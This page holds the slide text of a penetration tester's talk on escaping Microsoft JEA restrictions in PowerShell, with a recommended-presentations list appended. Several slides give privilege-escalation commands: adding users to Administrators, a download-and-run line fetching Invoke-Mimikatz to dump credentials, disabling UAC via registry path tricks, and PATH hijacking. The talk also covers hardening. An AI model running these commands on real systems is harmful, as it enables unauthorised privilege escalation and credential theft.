bypassing microsoft jea role capabilities
play

Bypassing Microsoft JEA role capabilities for fun & profit - PowerPoint PPT Presentation

May 01, 2023 •153 likes •376 views

Bypassing Microsoft JEA role capabilities for fun & profit whoami Cristhian Parrot - @elc0rr3Km1n0s Sr. Penetration Tester & Lead Auditor @Airbus Father, Bug Hunter, Tech-entrepreneur Plan Intro Install Prerequisites

  1. Bypassing Microsoft JEA role capabilities for fun & profit

  2. whoami ★ Cristhian Parrot - @elc0rr3Km1n0s ★ Sr. Penetration Tester & Lead Auditor @Airbus ★ Father, Bug Hunter, Tech-entrepreneur

  3. Plan ★ Intro ★ Install Prerequisites ★ Using JEA ★ Breaking into JEA ★ Security measures

  4. Quick Intro Just Enough Administration (JEA) RBAC solution Works with PowerShell Works as a whitelist and not as a blacklist

  5. JEA concept

  6. Prerequisites ★ Powershell 5.0 or Later (5.1 recommended) ★ PowerShell Remoting ★ PS Remoting (and WinRM) listen on the following ports: ○ HTTP: 5985 ○ HTTPS: 5986 Enabled by default on Windows Server 2012, 2012 R2, and 2016

  7. How JEA works ❏ Create a PS session configuration file

  8. How JEA works ❏ Create a PS role capability file for HelpDesk

  9. How JEA works ❏ Registering the configuration ❏ Testing the configuration ★ “ RestrictedRemoteServer ” allows the execution of the following commands: ○ Clear-Host (cls, clear) ○ Exit-PSSession (exsn, exit) ○ Get-Command (gcm) ○ Get-FormatData ○ Get-Help ○ Measure-Object (measure) ○ Out-Default ○ Select-Object (select)

  10. Privilege escalation tips dangerous commands ★ Granting a user to admin ○ Add-ADGroupMember, Add-LocalGroupMember, net.exe, dsadd.exe ★ Running arbitrary code ○ Start-Process, New-Service, Invoke-Item, Invoke-WmiMethod, Invoke-Command, New-ScheduledTask, Register-ScheduledJob

  11. Privilege escalation tips Quick wins 1: net.exe group Administrators unprivilegeduser /add 2: Start-Process -FilePath '\\netshare\share\malware.exe' If "FullLanguage" is enabled: 3: Invoke-Command <TARGET> (iex((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m attifestation/PowerSploit/master/Exfiltration/Invoke- Mimikatz.ps1')); Invoke-Mimikatz – DumpCreds)

  12. Privilege escalation tips Playing with files and folders paths Filter with wildcards: Bypass: C:\Users\..\Windows\System32\...

  13. Privilege escalation tips Playing with the registry Scenario: A rule allows some changes in the registry, but a filter checks that the strings "SOFTWARE\Microsoft", "Microsoft\Windows" are not present in the path specified by the user. Bypass filter:

  14. Privilege escalation tips Playing with the registry Issues with UAC? Disable it! PS C:\> Set-ItemProperty -Path "HKLM:\SOFTWARE\pentest\..\Microsoft\pentest\..\Windows\CurrentVersion\Pol icies\System" -Name "EnableLUA" -Value 0

  15. Privilege escalation tips Playing with WinRM session variables Abuse of PS module variable (and wildcards):

  16. Privilege escalation tips Playing with environment variables Modification of PATH variable allowed? Create evil cmd.exe into the controlled path: C:\Users\<unprivileged_user>\Documents\cmd.exe

  17. Privilege escalation tips Rights to install MSIs? Generation of a MSI package (thanks #PowerSploit  ) PS C:\> Invoke-WindowsInstaller "/i <X>:\Temp\UserAdd.msi /quiet /norestart"

  18. Privilege escalation tips Abuse of the second hop Check if CredSSP is enabled on target host: ○ Launch Mimikatz ○ PTH ○ Etc…

  19. PowerShell Logging As a Blue Team (or pentester) Check if scriptblocklogging is enabled:

  20. Security measures Securing JEA ❏ Constraing Language mode ❏ Constrained endpoints ❏ PS Auditing via GPO to all target systems ❏ Enabling centralized PS transcript logging via GPO of all target systems ❏ Only allow signed scripts - certificates to run ❏ Application white listing via App restriction policies

  21. Links Microsoft https://docs.microsoft.com/en-us/powershell/jea/overview Technet Microsoft Blog https://blogs.technet.microsoft.com/datacentersecurity/2017/04/24/le verage-powershell-just-enough-administration-for-your-helpdesk/ MSDN Microsoft blog https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell -the-blue-team/ FireEye https://www.fireeye.com/content/dam/fireeye- www/global/en/solutions/pdfs/wp-lazanciyan-investigating- powershell-attacks.pdf

  22. Thanks for your attention! Cristhian Parrot - @elc0rr3Km1n0s cparrot@pm.me

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Analysis of Bypassing Detection by Microsoft Advanced Threat Analytics Edgar Bohte and Nick

Analysis of Bypassing Detection by Microsoft Advanced Threat Analytics Edgar Bohte and Nick

Analysis of Bypassing Detection by Microsoft Advanced Threat Analytics Edgar Bohte and Nick Offerman Research Project 2 #72 Introduction - Advanced Threat Analytics (ATA) Microsoft Active Directory (AD) On-premise Post-Infiltration

439 views • 25 slides
Bypassing Mitigations by Attacking JIT Server in Microsoft Edge Ivan Fratric Infiltrate 2018

Bypassing Mitigations by Attacking JIT Server in Microsoft Edge Ivan Fratric Infiltrate 2018

Bypassing Mitigations by Attacking JIT Server in Microsoft Edge Ivan Fratric Infiltrate 2018 About me Security researcher at Google Project Zero Previously: Google Security Team, Academia (UNIZG) Doing security research for the last

774 views • 48 slides
Capabilities and Human Development: the critical role of Development: the critical role of social

Capabilities and Human Development: the critical role of Development: the critical role of social

Capabilities and Human Development: the critical role of Development: the critical role of social institutions and social competencies Frances Stewart Introduction Introduction Individuals cannot flourish or even function alone.

337 views • 32 slides
Role of ICT in Enhancing Technological Capabilities K. Ramanathan Asian and Pacific Centre for

Role of ICT in Enhancing Technological Capabilities K. Ramanathan Asian and Pacific Centre for

ITU, ESCAP, APT Capacity Building Workshop on Information Society Statistics: Infrastructure and Household Indicators 6-8 November, 2007 UN ESCAP Building, Bangkok Role of ICT in Enhancing Technological Capabilities K. Ramanathan

543 views • 26 slides
Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net

Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net

Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Research into reliable exploitation techniques: Heap Feng Shui in JavaScript Bypassing browser

1.1k views • 48 slides
ONLINE AUCTIONS AND MULTICHANNEL SALES PROCESSES: THE ROLE OF SELLER CAPABILITIES Jason

ONLINE AUCTIONS AND MULTICHANNEL SALES PROCESSES: THE ROLE OF SELLER CAPABILITIES Jason

ONLINE AUCTIONS AND MULTICHANNEL SALES PROCESSES: THE ROLE OF SELLER CAPABILITIES Jason Kuruzovich The Lally School of Management and Technology Rensselaer Polytechnic Institute, Troy, New York 12180 518.276.2332; kuruzj@rpi.edu - 1 - PAPER

387 views • 9 slides
Bypassing Web Application Firewalls an approach for pentesters KHALIL BIJJOU SECURITY

Bypassing Web Application Firewalls an approach for pentesters KHALIL BIJJOU SECURITY

Bypassing Web Application Firewalls an approach for pentesters KHALIL BIJJOU SECURITY CONSULTANT 17 th November 2017 BYPASSING A WAF WHY? Number of deployed Web Application Firewalls (WAFs) is increasing WAFs make a penetration

533 views • 34 slides
Bypassing the hubs - The potential of secondary European airports in the long haul sector Sven

Bypassing the hubs - The potential of secondary European airports in the long haul sector Sven

Bypassing the hubs - The potential of secondary European airports in the long haul sector Sven Maertens / DLR 7th Conference on Applied Infrastructure Research, OCT 10-11, 2008 Sven Maertens DLR Bypassing the hubs Page 1 Structure

559 views • 22 slides
5.2 Microsoft Excel Microsoft Excel Microsoft Excel is the spreadsheet component of the

5.2 Microsoft Excel Microsoft Excel Microsoft Excel is the spreadsheet component of the

5.2 Microsoft Excel Microsoft Excel Microsoft Excel is the spreadsheet component of the Microsoft Office Suite. It is used primarily to enter, edit, format, sort, perform mathematical computations, save, retrieve and print numeric

717 views • 32 slides
Bypassing 802.1X In an IPv6 environment Introduction and motivation What is 802.1X? IEEE

Bypassing 802.1X In an IPv6 environment Introduction and motivation What is 802.1X? IEEE

Robert Diepeveen &amp; Ruben de Vries Bypassing 802.1X In an IPv6 environment Introduction and motivation What is 802.1X? IEEE standard Port-based network access protocol Authentication mechanism for devices wishing to attach to

357 views • 17 slides
Confidential Accelerators Stavros Volos Microsoft Research Accelerators Play Pivotal Role in

Confidential Accelerators Stavros Volos Microsoft Research Accelerators Play Pivotal Role in

Confidential Accelerators Stavros Volos Microsoft Research Accelerators Play Pivotal Role in Cloud GPU, FPGA, AI Accelerators (e.g., Brainwave, TPU) Increasing compute performance and bandwidth E.g., Nvidia V100 offers 14 TFLOPS &amp; ~1

300 views • 12 slides
NGN OAM Capabilities NGN OAM Capabilities Dinesh Mohan CTO S r. Advisor, Nortel I TU-T W

NGN OAM Capabilities NGN OAM Capabilities Dinesh Mohan CTO S r. Advisor, Nortel I TU-T W

I nternational Telecom m unication Union ITU-T NGN OAM Capabilities NGN OAM Capabilities Dinesh Mohan CTO S r. Advisor, Nortel I TU-T W orkshop NGN and its Transport Netw orks Kobe, 2 0 -2 1 April 2 0 0 6 NGN OAM Activities Update

777 views • 15 slides
Redirection Capabilities in SIP Redirection Capabilities in SIP

Redirection Capabilities in SIP Redirection Capabilities in SIP

Redirection Capabilities in SIP Redirection Capabilities in SIP draft-bharatia-sipping-redirect-00.txt Authors: J. Bharatia, S. Sen, R. Yuhanna, S. Orton, M. Watson Presenter: Mark Watson mwatson@nortelnetworks.com General Motivation SIP

478 views • 5 slides
Breaking Through Another Side Bypassing Firmware Security Boundaries from Embedded Controller

Breaking Through Another Side Bypassing Firmware Security Boundaries from Embedded Controller

Breaking Through Another Side Bypassing Firmware Security Boundaries from Embedded Controller Alex Matrosov Alexandre Gazet Actually 5 months of passionate reverse-engineering nights Disclaimer All the details given about BIOS Guard

968 views • 77 slides
4.2 Microsoft Word Microsoft Word is the word processing component of the Microsoft Office

4.2 Microsoft Word Microsoft Word is the word processing component of the Microsoft Office

4.2 Microsoft Word Microsoft Word is the word processing component of the Microsoft Office Suite It is used primarily to enter, edit, format, save, retrieve and print documents Objectives Identify the main components of the user

399 views • 29 slides
Financial Complexity Physical Capabilities Process Capabilities Other Issues

Financial Complexity Physical Capabilities Process Capabilities Other Issues

Financial Complexity Physical Capabilities Process Capabilities Other Issues Upfront Costs - Financing (PPAs, Tax Credits, ESCOs) Split Incentive Alternatives - Virtual Net Metering Where to start? Intelligent

640 views • 8 slides
Cloud Interconnections William B. Norton Console, Chief Scientist Last Updated: 9/19/16 4:04pm

Cloud Interconnections William B. Norton Console, Chief Scientist Last Updated: 9/19/16 4:04pm

Cloud Interconnect Models v1.6 Cloud Interconnections William B. Norton Console, Chief Scientist Last Updated: 9/19/16 4:04pm Comments to the author welcome: wbn@console.net Cloud Interconnections William B. Norton Console, Chief Scientist

300 views • 12 slides
Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit

Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit

Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit Yeongjin Jang, Tielei Wang, Byoungyoung Lee, and Billy Lau Georgia Tech Informa;on Security Center

989 views • 84 slides
Cost-Effective Compiler Directed Memory Prefetching and Bypassing Daniel Ortega, , Eduard

Cost-Effective Compiler Directed Memory Prefetching and Bypassing Daniel Ortega, , Eduard

Cost-Effective Compiler Directed Memory Prefetching and Bypassing Daniel Ortega, , Eduard Ayguad e , Jean-Loup Baer and Mateo Valero Departamento de Arquitectura de Computadores, Department of

676 views • 39 slides
based Last Level Cache Kunal Korgaonkar, Ishwar Bhati, Huichu Liu, Jayesh Gaur, Sasikanth

based Last Level Cache Kunal Korgaonkar, Ishwar Bhati, Huichu Liu, Jayesh Gaur, Sasikanth

Density Tradeoffs of Non-Volatile Memory as a Replacement for SRAM based Last Level Cache Kunal Korgaonkar, Ishwar Bhati, Huichu Liu, Jayesh Gaur, Sasikanth Manipatruni, Sreenivas Subramoney, Tanay Karnik, Steven Swanson, Ian Young and Hong Wang

373 views • 18 slides
2PAC 2Furious: Envisioning an iOS compromise in 2019 Marco Grassi - @marcograss Liang Chen -

2PAC 2Furious: Envisioning an iOS compromise in 2019 Marco Grassi - @marcograss Liang Chen -

2PAC 2Furious: Envisioning an iOS compromise in 2019 Marco Grassi - @marcograss Liang Chen - @chenliang0817 About Us Members of Tencent KEEN Security Lab (formerly known as KeenTeam) Marco (@marcograss): My main focus is

846 views • 61 slides
A GHOST FROM POSTSCRIPT for RUXCON 2017 A GHOST FROM POSTSCRIPT WHO ARE WE redrain

A GHOST FROM POSTSCRIPT for RUXCON 2017 A GHOST FROM POSTSCRIPT WHO ARE WE redrain

REDRAIN &amp; MIN(SPARK) ZHENG A GHOST FROM POSTSCRIPT for RUXCON 2017 A GHOST FROM POSTSCRIPT WHO ARE WE redrain min(spark) zheng Qihoo 360CERT CUHK PhD Alibaba Security Expert Low-level security researcher Pentester with interest in

818 views • 52 slides
gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark

gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark

gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark Heffernan, Chris Leary, Jacques Pienaar, Bjarke Roune, Rob Springer, Xuetian Weng, Artem Belevich, Robert Hundt One-Slide Overview Motivation Lack

436 views • 39 slides
the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel

the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel

Userspace networking: beyond the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel integration Benot Ganne, bganne@cisco.com 30/01/2020 1 Why a native network driver? Why userspace networking?

773 views • 8 slides

More recommend